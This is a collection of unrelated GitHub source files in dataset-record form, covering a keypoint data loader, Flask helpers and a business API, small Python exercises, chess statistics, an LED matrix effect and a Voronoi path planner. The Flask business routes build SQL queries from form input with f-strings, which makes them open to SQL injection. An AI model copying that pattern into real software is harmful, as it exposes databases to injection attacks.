isinstance(json_path, list): # 将多个root\n\n root = os.path.dirname(json_path[0])\n for json_i in json_path:\n print(json_i)\n with open(json_i) as data_file:\n json_data_i = json.load(data_file)\n json_data.extend(json_data_i)\n # print(len(json_data_i), type(json_data_i))\n # print(len(json_data))\n\n elif isinstance(json_path, str):\n root = os.path.dirname(json_path)\n with open(json_path) as data_file:\n json_data = json.load(data_file)\n # data_this = json.load(data_file)\n # data = data_this['root']\n\n num_samples = len(json_data)\n train_indexes = []\n val_indexes = []\n for count in range(num_samples):\n if json_data[count]['isValidation'] != 0.:\n val_indexes.append(count)\n else:\n train_indexes.append(count)\n\n # print('train dataset len:', len(train_indexes), ' val dataset len:', len(val_indexes))\n\n # root = data_dir\n # root = os.path.dirname(json_path)\n\n kik_data = UGVKeyPoints(root=root,\n index_list=train_indexes if training else val_indexes,\n data=json_data, feat_stride=feat_stride,\n preprocess=preprocess, transform=ToTensor(), params_transform=params_transform,\n numkeypoints=4, numlims=4, aug=aug, classification=classification) # Mod by Jie.\n\n data_loader = sDataLoader(kik_data, batch_size=batch_size, shuffle=shuffle, num_workers=num_workers)\n\n return data_loader\n\n","repo_name":"waterljwant/UGV-KPNet","sub_path":"training/datasets/ugvkp.py","file_name":"ugvkp.py","file_ext":"py","file_size_in_byte":2288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33406185734","text":"from ulakbus import settings\nfrom ulakbus.models import BAPFirma, User\nfrom zengine.lib.test_utils import BaseTestCase\n\n\nclass TestCase(BaseTestCase):\n \"\"\"\n Firmaların, teklife açık bütçe kalemlerine \n teklif vermesini sağlayan iş akışı testi.\n\n \"\"\"\n\n def test_bap_firma_basvuru_degerlendirme(self):\n firma = BAPFirma.objects.get(\"5uGjOb0fj9rzGwfIwYoSIN2pNRH\")\n self.prepare_client('/bap_firma_basvuru_degerlendirme',\n username='bap_koordinasyon_birimi_1')\n resp = self.client.post()\n\n # listeleme ekranı\n assert resp.json['forms']['schema']['title'] == \"Firma Başvuru 
Değerlendirmeleri\"\n assert \"Firma Adı\" in resp.json['objects'][0]\n assert \"Vergi Kimlik Numarası\" in resp.json['objects'][0]\n action_names = [\"Karar Ver\", \"İncele\"]\n for action in resp.json['objects'][1]['actions']:\n assert action['name'] in action_names\n\n # incele\n resp = self.client.post(wf='bap_firma_basvuru_degerlendirme', cmd=\"incele\",\n object_id=\"5uGjOb0fj9rzGwfIwYoSIN2pNRH\")\n assert \"Firması Kayıt Başvurusu Değerlendirme\" in resp.json['forms']['schema']['title']\n assert resp.json['object']['Firma Adı'] == 'Veli Usta Dondurma'\n assert resp.json['object']['Vergi No'] == '8402384024802'\n\n # geri don\n resp = self.client.post(wf='bap_firma_basvuru_degerlendirme', cmd=\"geri_don\")\n assert resp.json['forms']['schema']['title'] == \"Firma Başvuru Değerlendirmeleri\"\n\n # karar, geri don\n resp = self.client.post(wf='bap_firma_basvuru_degerlendirme', cmd=\"karar_ver\",\n object_id=\"5uGjOb0fj9rzGwfIwYoSIN2pNRH\")\n assert \"Firması Başvuru Değerlendirme Kararı\" in resp.json['forms']['schema']['title']\n assert \"değerlendirme kararınızı veriniz\" in resp.json['forms']['form'][0]['helpvalue']\n resp = self.client.post(wf='bap_firma_basvuru_degerlendirme', cmd=\"red\", form={'red': 1})\n assert \"Firması Başvuru Reddi Gerekçesi\" in resp.json['forms']['schema']['title']\n resp = self.client.post(wf='bap_firma_basvuru_degerlendirme', cmd=\"gonder\",\n form={'gerekce': \"Belgeler eksik\"})\n assert \"Firması Başvuru Reddi\" in resp.json['forms']['schema']['title']\n resp = self.client.post(wf='bap_firma_basvuru_degerlendirme', cmd=\"geri_don\",\n form={'geri': 1})\n assert \"Firması Başvuru Değerlendirme Kararı\" in resp.json['forms']['schema']['title']\n resp = self.client.post(wf='bap_firma_basvuru_degerlendirme', cmd=\"geri_don\",\n form={'geri': 1})\n assert resp.json['forms']['schema']['title'] == \"Firma Başvuru Değerlendirmeleri\"\n\n # karar, red\n self.client.post(wf='bap_firma_basvuru_degerlendirme', cmd=\"karar_ver\",\n object_id=\"5uGjOb0fj9rzGwfIwYoSIN2pNRH\")\n self.client.post(wf='bap_firma_basvuru_degerlendirme', cmd=\"red\", form={'red': 1})\n self.client.post(wf='bap_firma_basvuru_degerlendirme', cmd=\"gonder\",\n form={'gerekce': \"Belgeler eksik\"})\n resp = self.client.post(wf='bap_firma_basvuru_degerlendirme', cmd=\"onayla\",\n form={'onayla': 1})\n assert resp.json['msgbox']['title'] == \"Firma Başvuru Kaydı Değerlendirme\"\n assert 'firma yetkilisine başarıyla iletilmiştir' in resp.json['msgbox']['msg']\n\n del resp.json['objects'][0]\n firma_adlari_list = [obj['fields'][0] for obj in resp.json['objects']]\n assert \"Veli Usta Dondurma\" not in firma_adlari_list\n kullanici = firma.Yetkililer[0].yetkili\n assert User.objects.filter(key=kullanici.key).count() == 0\n assert BAPFirma.objects.filter(key=\"5uGjOb0fj9rzGwfIwYoSIN2pNRH\").count() == 0\n firma = BAPFirma.objects.filter(key=\"5uGjOb0fj9rzGwfIwYoSIN2pNRH\", deleted=True)[0]\n kullanici = User.objects.filter(key=kullanici.key, deleted=True)[0]\n firma.deleted = False\n firma.save()\n kullanici.deleted = False\n kullanici.save()\n\n # karar, onayla\n assert resp.json['forms']['schema']['title'] == \"Firma Başvuru Değerlendirmeleri\"\n self.client.post(wf='bap_firma_basvuru_degerlendirme', cmd=\"karar_ver\",\n object_id=\"OzRUS2vPOp12ju4Oj47CwaeRvV6\")\n resp = self.client.post(wf='bap_firma_basvuru_degerlendirme', cmd=\"onayla\",\n form={'onayla': 1})\n assert \"Firması Başvuru Kabulü\" in resp.json['forms']['schema']['title']\n assert \"onaylıyor musunuz\" in 
resp.json['forms']['form'][0]['helpvalue']\n resp = self.client.post(wf='bap_firma_basvuru_degerlendirme', cmd=\"onayla\",\n form={'onayla': 1})\n\n firma = BAPFirma.objects.get(\"OzRUS2vPOp12ju4Oj47CwaeRvV6\")\n assert firma.durum == 2\n\n assert resp.json['msgbox']['title'] == \"Firma Başvuru Kaydı Değerlendirme\"\n assert firma.ad in resp.json['msgbox']['msg']\n\n del resp.json['objects'][0]\n firma_adlari_list = [obj['fields'][0] for obj in resp.json['objects']]\n assert firma.ad not in firma_adlari_list\n\n kullanici = firma.Yetkililer[0].yetkili\n assert kullanici.is_active == True\n role = kullanici.role_set[0].role\n assert 'bap_firma_teklif' in role.get_permissions()\n\n firma.durum = 1\n firma.blocking_save()\n kullanici.is_active = False\n kullanici.blocking_save()\n\n # belge indir\n firma = BAPFirma.objects.get(\"5uGjOb0fj9rzGwfIwYoSIN2pNRH\")\n self.prepare_client('/bap_firma_basvuru_degerlendirme',\n username='bap_koordinasyon_birimi_1')\n self.client.post()\n\n self.client.post(wf='bap_firma_basvuru_degerlendirme', cmd=\"incele\",\n object_id=\"5uGjOb0fj9rzGwfIwYoSIN2pNRH\")\n resp = self.client.post(wf='bap_firma_basvuru_degerlendirme', cmd=\"indir\",\n form={\"belge_indir\": 1})\n assert resp.json['download_url'] == \"%s%s\" % (\n settings.S3_PUBLIC_URL, firma.faaliyet_belgesi)\n","repo_name":"zetaops/ulakbus","sub_path":"tests/test_bap_firma_basvuru_degerlendirme.py","file_name":"test_bap_firma_basvuru_degerlendirme.py","file_ext":"py","file_size_in_byte":6283,"program_lang":"python","lang":"tr","doc_type":"code","stars":101,"dataset":"github-code","pt":"48"} +{"seq_id":"18402958281","text":"import threading\nimport time\n\nclass Queue:\n def __init__(self):\n self.sth=-1\n self.cond=threading.Condition()\n\n def put(self,sth):\n with self.cond:\n while self.sth != -1:\n self.cond.wait()\n self.sth=sth\n self.cond.notify()\n\n def take(self):\n with self.cond:\n while self.sth == -1:\n self.cond.wait()\n res=self.sth\n self.sth=-1\n self.cond.notify()\n return res\n\ndef producer(queue):\n for sth in range(5):\n queue.put(sth)\n print(\"队列中放入{}\".format(sth))\n time.sleep(1)\n\ndef consumer(queue):\n for i in range(5):\n res=queue.take()\n print(\"队列中取出{}\".format(res))\n time.sleep(1)\n\nqueue=Queue()\np = threading.Thread(target=producer,args=(queue,))\nc = threading.Thread(target=consumer,args=(queue,))\n\np.start()\nc.start()\n\n\n\n\n","repo_name":"hellozepp/gitbyhellozepp","sub_path":"python/iotest-pyy/iotestpy/parallel/thread/conditiontest1.py","file_name":"conditiontest1.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"73823467985","text":"from flask import redirect, render_template, request, session, abort\nfrom functools import wraps\nimport ast\n\nimport datetime\n\nAPP_DATE_FORMAT = '%d/%m/%Y'\n\ndef loginRequired(route):\n \"\"\" Verify if user is logged-in for pages where it is required. \"\"\"\n @wraps(route)\n def decorated_route(*args, **kwargs):\n if session.get('user_id') is None:\n return redirect('/login')\n return route(*args, **kwargs)\n return decorated_route\n\ndef loggedInNotAllowed(route):\n \"\"\" Verify if a logged user is trying to access a page for not logged in users. 
\"\"\"\n @wraps(route)\n def decorated_route(*args, **kwargs):\n if not(session.get('user_id') is None):\n return redirect('/')\n return route(*args, **kwargs)\n return decorated_route\n\ndef checkAllowance(allowance):\n \"\"\"Verify if user has the allowance level for the selected page\"\"\"\n def innerDecor(route):\n @wraps(route)\n def decorated_route(*args, **kwargs):\n if session.get('user_info'):\n if session['user_info']['allowance'] >= allowance:\n return route(*args, **kwargs)\n else:\n return abort(403)\n else:\n return abort(403)\n return decorated_route\n return innerDecor\n\ndef renderEditorData(editor_data):\n WARNING_SYMBOL = ''\n editor_data = ast.literal_eval(editor_data)\n rendered_html = ''\n for item in editor_data:\n new_html = ''\n if not rendered_html == '':\n rendered_html = rendered_html + '\\n'\n if item['type'] == 'paragraph':\n new_html = '

'+item['data']['text']+'

'\n \n elif item['type'] == 'list':\n \n if item['data']['style'] == 'unordered':\n new_html = '
    '\n for li in item['data']['items']:\n print('li:' + li)\n new_html = new_html + '
  • '+ li + '
  • '\n new_html = new_html + '

'\n elif item['data']['style'] == 'ordered':\n new_html = '
    '\n for li in item['data']['items']:\n print('li:' + li)\n new_html = new_html + '
  1. '+ li + '
  2. '\n new_html = new_html + '
    '\n \n elif item['type'] == 'header':\n classes = {\n 1:\"font-inputs text-3xl text-center my-3 font-extrabold\",\n 2:\"font-inputs text-2xl text-center my-3 font-bold\",\n 3:\"font-inputs text-xl text-center my-3 font-medium\",\n 4:\"font-inputs text-lg text-center my-3 font-medium\",\n 5:\"font-inputs text-lg text-center my-3 font-medium\",\n 6:\"font-inputs text-lg text-center my-3 font-medium\"\n }\n new_html = '' + item['data']['text'] + ''\n elif item['type'] == 'quote':\n new_html = '
    \"

    '+item['data']['text']+'

    \"
    — '+item['data']['caption']+'
    '\n elif item['type'] == 'warning':\n new_html = '
    cc'+item['data']['title']+'
    '+WARNING_SYMBOL+''+item['data']['message']+'
    '\n elif item['type'] == 'image':\n new_html = '
    '+item['data']['caption']+'
    '\n elif item['type'] == 'linkTool':\n pass\n rendered_html = rendered_html + new_html\n\n \n\n\n return rendered_html","repo_name":"araujoarthur/RoseOnWiki","sub_path":"helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":4703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74748261265","text":"import cv2\r\nimport numpy as np\r\n\r\nimage = cv2.imread('resim1.jpg')\r\nred_channel, green_channel, blue_channel = cv2.split(image)\r\n\r\ncv2.imshow('Red', red_channel)\r\ncv2.waitKey(0)\r\ncv2.imshow('Green', green_channel)\r\ncv2.waitKey(0)\r\ncv2.imshow('Blue', blue_channel)\r\ncv2.waitKey(0)\r\n\r\n\r\nno_green_image = cv2.merge((blue_channel,np.zeros_like(green_channel),red_channel))\r\ncv2.imshow('No green image', no_green_image)\r\ncv2.waitKey(0)\r\n\r\noriginal_coloured_image = cv2.merge((blue_channel, green_channel, red_channel))\r\ncv2.imshow('Original image', original_coloured_image)\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()","repo_name":"berkeakdnz/-SE226-","sub_path":"lab7/lab7.py","file_name":"lab7.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15451971795","text":"#Takes in a first name and a last name, and prints out a full name, in a sentence\n#call the function three times\n\n\ndef nome_a_caso (name, surname):\n\n\tfull = (name + ' ' + surname)\n\tprint('ciao %s' %full)\n\nnames = {'Roberto': 'Giallo', 'Bilbo':'Baggins', 'Sheldon':'Cooper'}\n\nfor name, surname in names.items():\n\tnome_a_caso(name,surname)\n\n \n","repo_name":"elebonel/testrepo","sub_path":"fullnames.py","file_name":"fullnames.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9594978234","text":"import pandas\nimport random\nimport matplotlib\nimport numpy as np\nimport matplotlib.pyplot as plts\n\nmass = [float(m) for m in input(\"Введите все значение масс грузов через пробел\").split()]\nmass = np.array(mass)\n\nplts.bar(list(range(len(mass))), mass)\nplts.title('Experimental data')\n\ndf = pandas.DataFrame(data={\n 'mass': mass\n})\n\ndf.to_csv(\"mass.csv\")\n\ndf1 = pandas.read_csv(\"mass.csv\")\n\ndf1['mass'].plot(kind='bar')\n\ndf12 = pandas.DataFrame(data={\n 'df1': df1['mass']})\n\ndf12.plot.kde()\n\nfrom scipy import stats\n\nd1 = df12['df1']\n\nplts.show()\n\nprint(stats.kstest(d1, 'norm', (d1.mean(), d1.std()), N=5000))\n","repo_name":"Mikhail000Yasinski/1","sub_path":"stat_istik.py","file_name":"stat_istik.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10053244094","text":"class Solution:\n def checkIfExist(self, arr: List[int]) -> bool:\n val = 0\n for i in range(len(arr)):\n val = arr[i]\n for j in range(i+1,len(arr),1):\n if (val == 2*arr[j] or arr[j] == 2*val):\n print(val,arr[j])\n return True\n return False","repo_name":"akshatasingh21/python101","sub_path":"Leetcode/1346. Check If N and Its Double Exist.py","file_name":"1346. Check If N and Its Double Exist.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27421290964","text":"\"\"\"An example script showing the functionality of get_game_data_lichess. 
Plots\nthe results of 25 000 rated Lichess games played in December 2012 (ignoring\ngames that aren\"t Blitz, Bullet or Classical).\"\"\"\n\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom utils import get_game_data_lichess\n\n\n# Globals\nFILE_PATH = \"lichess_db_standard_rated_2013-01.pgn.bz2\"\nTAGS = {\"Event\", \"Result\"}\nTIME_FORMATS = [\"Bullet\", \"Blitz\", \"Classical\"]\nGAME_RESULTS = [\"1-0\", \"1/2-1/2\", \"0-1\"]\nGAME_RESULTS_LABELS = [\"White win\", \"Draw\", \"Black win\"]\nCOLORS = [\"#fffa9e\", \"#eb6746\", \"#a6174c\"]\nGAMES_N = 25000\n\n\ndef main() -> None:\n \"\"\"The main function.\"\"\"\n\n data = np.zeros([3, 3])\n game_generator = get_game_data_lichess(FILE_PATH, TAGS, max_games=GAMES_N)\n\n # Goes through the games and tallies their results.\n for game in game_generator:\n time_format = game[\"Event\"].split()[1]\n if time_format not in TIME_FORMATS:\n continue\n time_index = TIME_FORMATS.index(time_format)\n result_index = GAME_RESULTS.index(game[\"Result\"])\n data[result_index][time_index] += 1\n\n # Scales results for each time format.\n for i in range(len(data)):\n data[:, i] *= 100 / np.sum(data[:, i])\n\n # Displays the plot.\n axes = plt.subplots()[1]\n cumulative_sum = np.zeros(data.shape[0])\n\n for i, value in enumerate(data):\n axes.bar(\n TIME_FORMATS,\n value,\n 0.35,\n bottom=cumulative_sum,\n label=GAME_RESULTS_LABELS[i],\n color=COLORS[i]\n )\n cumulative_sum += data[i]\n\n axes.set_ylabel(\"Results (percentage)\")\n axes.set_title(\"Lichess game results by time format\")\n axes.legend()\n\n plt.show()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"midnattssol/Chess-Statistics-Toolkit","sub_path":"example_get_games.py","file_name":"example_get_games.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"71351492945","text":"\"\"\"\nFile: Spring 2016 Midterm Practice\nName: Ethan Ton\n\"\"\"\n\n\"\"\"\nQuestion 1.\n\nExpression:(3 and abs)(-1)\nOutput:\n1\n\nExpression: print(3) or 1/0\nOutput:\n3\nError\n\nExpression: print\nOutput:\nFunction\n\nExpression: ([1, 2, 3] if y // (y+1) else [4, 5]) [1]\nOutput:\n5\n\nExpression: w(5)\nOutput:\n3\n\"\"\"\n\n\"\"\"\nQuestion 1b.\nExpression: print(d([1, 2, 3]), d([0, 1, 2, 1, 0]))\nOutput:\nFalse True\n\"\"\"\n\n\"\"\"\nQuestion 2.\nGlobal Frame\n y = 3\n out = func out(h, m)\n v = 5\n \nf1: out\nparent: Global\n h = None\n m = 1\n inner = func inner()\n y = 5\n return value = func inner()\n \nf2: out \nparent: Global\n h = func ininer()\n m = 0\n inner = func inner()\n y = 0\n return value = func inner()\n \nf3: inner\nparent: f1\n return value = 5\n\"\"\"\n\n\"\"\"\nQuestion 2b.\n\nGlobal Frame\n lazy = func lazy(n)\n v = 5\n \nf1: lazy\nparent: Global\n n = 4\n return value = lambda func line 2\n \nf2: lambda line 2\nparent: f1\n k = 1\n return value = lambda func line 2\n \nf3: lazy\nparent: Global \n n = 5\n return value = lambda func line 2\n \nf4: lambda line 2\nparent: f3\n k = 0\n return value = 5\n\"\"\"\n\n#Question 4.\ndef has_cycle(L, k):\n def cycle_at(s):\n p = L[s]\n n = 1\n while n < k:\n if p == s:\n return False\n p = L[p]\n n += 1\n return p == s\n for j in range(len(L)):\n if cycle_at(j):\n return True\n return False\n\n#Question 5\ndef count_groupings(n):\n if n == 1:\n return 1\n total = 0\n i = 1\n while i < n:\n total += count_groupings(i) * count_groupings(n - i)\n i += 1\n return total\n\n#Question 6\ndef pred_maze(x0, y0, open, exit):\n def 
maze(dir):\n        x, y = (x0, y0 - 1) if dir == \"south\" else (x0 -1 , y0)\n        if x <= exit:\n            return \"exit\"\n        elif open(x, y):\n            return pred_maze(x, y, open, exit)\n        else:\n            return \"dead end\"\n    return maze\n\n#Question 6b.\ndef path_out(M):\n    for dir in [\"south\", \"west\"]:\n        next = M(dir)\n        if next == \"exit\":\n            return dir + \" \"\n        elif next != \"dead end\":\n            rest_of_path = path_out(next)\n            if rest_of_path:\n                return dir + \" \" + rest_of_path\n    return None","repo_name":"ethanton0927/Midterm","sub_path":"Spring_2016.py","file_name":"Spring_2016.py","file_ext":"py","file_size_in_byte":2358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"22182314065","text":"#\n# Matrix\n# 5 September 2022\n#\n\nimport random\nfrom operator import itemgetter\n\n\ndef run(matrix, config):\n\t\"\"\" Matrix \"\"\"\n\tlines = []\n\tmin_y = 0\n\tmin_x = 0\n\tmax_y = config['pixel_height']\n\tmax_x = config['pixel_width']\n\n\t# max speed of line movement\n\tmax_speed = 6\n\n\t# percent chance each pixel in a line goes missing to simulate static\n\tpercent_static = 0.20\n\n\tmatrix_color = matrix.color('green')\n\tbackground_color = matrix.color('black')\n \n\t# create a new matrix line about to drop down\n\tdef new_line():\n\t\tline_len = random.randrange(max_y)\n\t\treturn {'tail': -line_len, 'head': min_y, 'speed': random.randrange(1, max_speed)}\n\n\t# create initial matrix lines\n\tfor _ in range(max_x):\n\t\tlines.append(new_line())\n\n\twhile matrix.ready(): \n\t\tmatrix.reset(background_color)\n\t\t\n\t\tfor i in range(max_x):\n\t\t\thead, tail, speed = itemgetter('head', 'tail', 'speed')(lines[i])\n\t\t\thead += speed\n\t\t\ttail += speed\n\t\t\tmatrix.line((i, head), (i, tail), matrix_color, 1)\n\n\t\t\t# add dead pixels in the matrix line to simulate static\n\t\t\tfor j in range(tail, head):\n\t\t\t\tif random.random() < percent_static:\n\t\t\t\t\tmatrix.pixel((i, j), background_color)\n\t\t\t\n\t\t\t# if matrix line drops below screen, create a new matrix line\n\t\t\tif tail > max_y:\n\t\t\t\tlines[i] = new_line()\n\t\t\telse:\n\t\t\t\tlines[i] = {'tail': tail, 'head': head, 'speed': speed}\n\n\t\tmatrix.show()\n","repo_name":"natelewis/pi-led-matrix","sub_path":"effects/matrix/effect.py","file_name":"effect.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"}
{"seq_id":"42950031421","text":"from flask import Blueprint, request, jsonify, make_response\nfrom src import db\n\nbusiness = Blueprint('business', __name__)\n\n\n# Get specific business\n@business.route('/business/<int:BusinessID>', methods=['GET'])\ndef get_id(BusinessID):\n    # get a cursor object from the database\n    cursor = db.get_db().cursor()\n\n    # query the database for the business with the given id\n    cursor.execute(\n        'select BusinessID, BusinessName, EmployeeCount, ZipCode, City, State, Country from Businesses where BusinessID={id}'.format(\n            id=BusinessID))\n\n    # grab the column headers from the returned data\n    column_headers = [x[0] for x in cursor.description]\n\n    # create an empty dictionary object to use in\n    # putting column headers together with data\n    json_data = []\n\n    # fetch all the data from the cursor\n    theData = cursor.fetchall()\n\n    # for each of the rows, zip the data elements together with\n    # the column headers.\n    for row in theData:\n        json_data.append(dict(zip(column_headers, row)))\n\n    return jsonify(json_data)\n\n\n@business.route('/business/<employee_count>')\ndef get_small_businesses(employee_count):\n    # 
get a cursor object from the database\n cursor = db.get_db().cursor()\n\n # use cursor to query the database for businesses that have an employee count that is less than the employee count entered\n cursor.execute(\n 'select BusinessID, BusinessName, EmployeeCount, ZipCode, City, State, Country from Businesses WHERE EmployeeCount < {employee_count}'.format(\n employee_count=employee_count))\n\n # grab the column headers from the returned data\n column_headers = [x[0] for x in cursor.description]\n\n # create an empty dictionary object to use in\n # putting column headers together with data\n json_data = []\n\n # fetch all the data from the cursor\n theData = cursor.fetchall()\n\n # for each of the rows, zip the data elements together with\n # the column headers.\n for row in theData:\n json_data.append(dict(zip(column_headers, row)))\n return jsonify(json_data)\n\n\n# add a business to our database\n@business.route('/business/add_business', methods=['GET', 'POST'])\ndef add_business():\n cursor = db.get_db().cursor()\n BusinessID = str(request.form['BusinessID'])\n BusinessName = str(request.form['BusinessName'])\n EmployeeCount = str(request.form['EmployeeCount'])\n ZipCode = str(request.form['ZipCode'])\n City = str(request.form['City'])\n State = str(request.form['State'])\n Country = str(request.form['Country'])\n\n cursor.execute(\n f'INSERT INTO Businesses(BusinessID, BusinessName, EmployeeCount, ZipCode, City, State, Country) VALUES (\"{BusinessID}\", \"{BusinessName}\", \"{EmployeeCount}\", \"{ZipCode}\", \"{City}\", \"{State}\", \"{Country}\")')\n db.get_db().commit()\n return \"Success\"\n\n\n\n# view the businesses\n@business.route('/business', methods=['GET'])\ndef get_businesses():\n cursor = db.get_db().cursor()\n cursor.execute('SELECT * FROM Businesses')\n row_headers = [x[0] for x in cursor.description]\n json_data = []\n theData = cursor.fetchall()\n for row in theData:\n json_data.append(dict(zip(row_headers, row)))\n the_response = make_response(jsonify(json_data))\n the_response.status_code = 200\n the_response.mimetype = 'application/json'\n return the_response\n\n@business.route('/get_business/')\ndef get_all_class(employee_count):\n cursor = db.get_db().cursor()\n query = f'''\n SELECT BusinessID, BusinessName, EmployeeCount\n FROM Businesses\n WHERE EmployeeCount < '{employee_count}'\n '''\n cursor.execute(query)\n # grab the column headers from the returned data\n column_headers = [x[0] for x in cursor.description]\n\n # create an empty dictionary object to use in\n # putting column headers together with data\n json_data = []\n\n # fetch all the data from the cursor\n theData = cursor.fetchall()\n\n # for each of the rows, zip the data elements together with\n # the column headers.\n for row in theData:\n json_data.append(dict(zip(column_headers, row)))\n\n return jsonify(json_data)\n\n\n# Get all people from personal\n@business.route('/business', methods=['GET'])\ndef get_employee_num():\n cursor = db.get_db().cursor()\n cursor.execute('SELECT * FROM Businesses')\n row_headers = [x[0] for x in cursor.description]\n json_data = []\n theData = cursor.fetchall()\n for row in theData:\n json_data.append(dict(zip(row_headers, row)))\n the_response = make_response(jsonify(json_data))\n the_response.status_code = 200\n the_response.mimetype = 'application/json'\n return 
the_response","repo_name":"p3rciv3l/KeyBase","sub_path":"flask-app/src/business/business.py","file_name":"business.py","file_ext":"py","file_size_in_byte":4647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17787599341","text":"'''\n给你两个单链表的头节点 headA 和 headB ,请你找出并返回两个单链表相交的起始节点。如果两个链表不存在相交节点,返回 null 。\n\n图示两个链表在节点 c1 开始相交:\n'''\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n def getIntersectionNode(self, headA: ListNode, headB: ListNode) -> ListNode:\n hashmap = {}\n while headA:\n hashmap[headA] = True\n headA = headA.next\n while headB:\n if headB in hashmap:\n return headB\n headB = headB.next\n return None","repo_name":"Witness521/leetcode","sub_path":"HOT100/160相交链表.py","file_name":"160相交链表.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30173873811","text":"import random\n\n\nclass RandomModel:\n '''Predicts race results randomly'''\n\n def __init__(self, seasonsData, raceResultsData):\n self.seasonsData = seasonsData\n self.raceResultsData = raceResultsData\n\n def constructPredictions(self):\n predictions = []\n\n for year, season in self.seasonsData.items(): # Read every season:\n racesAsList = list(season.races.items())\n racesAsList.sort(key=lambda x: x[1].round)\n for raceId, data in racesAsList:\n # A single race\n if raceId in self.raceResultsData:\n results = self.raceResultsData[raceId]\n driver_ids = [x['driverId'] for x in results]\n random.shuffle(driver_ids)\n predictions.append(driver_ids)\n return predictions","repo_name":"villekuosmanen/F1Predict","sub_path":"f1predict/race/baseline/RandomModel.py","file_name":"RandomModel.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"48"} +{"seq_id":"25458225723","text":"\nimport math\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom .dijkstra_search import DijkstraSearch\n# from dijkstra_search import DijkstraSearch\n\nfrom scipy.spatial import cKDTree, Voronoi\n#constants\nCYLINDER = 3\nSPHERE = 2\n\npi=math.pi\ndef PointsInCircum(r,n=100):\n return [(math.cos(2*pi/n*x)*r,math.sin(2*pi/n*x)*r) for x in range(0,n+1)]\n\nclass VoronoiRoadMapPlanner:\n def __init__(self,show_animation=False):\n self.show_animation = show_animation\n # parameter\n self.N_KNN = 15 # number of edge from one sampled point\n self.MAX_EDGE_LEN = 100.0 # [m] Maximum edge length\n\n # start and goal position\n self.sx = -3 # [m]\n self.sy = -2 # [m]\n self.gx = 4 # [m]\n self.gy = 3 # [m]\n self.robot_radius = 0.8 # [m]\n\n #setup world\n obs_setup=[\n ( 0, 2,0, CYLINDER ),\n ( -2, 2,0, CYLINDER ),\n ( 2, 2,0, CYLINDER ),\n ( 2, 0,0, CYLINDER ),\n ( 2,-2,0, CYLINDER ),\n\n # ( 3,-4,0, SPHERE ),\n # ( 4,-3,0, SPHERE )\n ]\n\n lims_positions=[\n ( 5, 5,0 ),\n ( -5, 5,0 ),\n ( 5,-5,0 ),\n ( -5,-5,0 )\n ]\n self.setupLimits()\n\n self.addObstacles(obs_setup) #uncomment this only while debugging\n\n if self.show_animation:\n plt.plot(self.ox, self.oy, \".k\")\n plt.plot(self.sx, self.sy, \"^r\")\n plt.plot(self.gx, self.gy, \"^c\")\n plt.grid(True)\n plt.axis(\"equal\")\n\n def setupLimits(self):\n self.ox,self.oy = [] ,[]\n\n limit_len=10\n n_points_limits=20\n for i in range(n_points_limits):\n self.ox.append(i/n_points_limits*limit_len-limit_len/2)\n self.oy.append(limit_len/2)\n for i in 
range(n_points_limits):\n self.ox.append(limit_len/2)\n self.oy.append(i/n_points_limits*limit_len-limit_len/2)\n\n for i in range(n_points_limits):\n self.ox.append(-limit_len/2)\n self.oy.append(i/n_points_limits*limit_len-limit_len/2)\n\n for i in range(n_points_limits):\n self.ox.append(i/n_points_limits*limit_len-limit_len/2)\n self.oy.append(-limit_len/2)\n \n def addObstacles(self,obs): \n for ob in obs:\n obsType=ob[3]\n xy=ob[:2]\n r=0.5\n # print(\"obsType:\",obsType)\n if obsType == CYLINDER:\n self.addCylinderObs(r,xy)\n elif obsType == SPHERE:\n self.addSphereObs(r,xy)\n\n def addSphereObs(self,r,pos):\n points=PointsInCircum(r=r,n=20)\n for i in points:\n # print(\"Adding cylinder at pos (%f,%f) \"% ( pos[0],pos[1] ) )\n self.ox.append(i[0]+pos[0])\n self.oy.append(i[1]+pos[1])\n \n def addCylinderObs(self,r,pos):\n points=PointsInCircum(r=r,n=20)\n for i in points:\n # print(\"Adding sphere at pos (%f,%f) \"% ( pos[0],pos[1] ) )\n self.ox.append(i[0]+pos[0])\n self.oy.append(i[1]+pos[1])\n\n def planning(self):\n sx, sy = self.sx,self.sy\n gx, gy = self.gx,self.gy\n ox, oy = self.ox,self.oy\n robot_radius = self.robot_radius\n\n obstacle_tree = cKDTree(np.vstack((ox, oy)).T)\n\n sample_x, sample_y = self.voronoi_sampling(sx, sy, gx, gy, ox, oy)\n if self.show_animation : \n plt.plot(sample_x, sample_y, \".b\")\n\n road_map_info = self.generate_road_map_info(\n sample_x, sample_y, robot_radius, 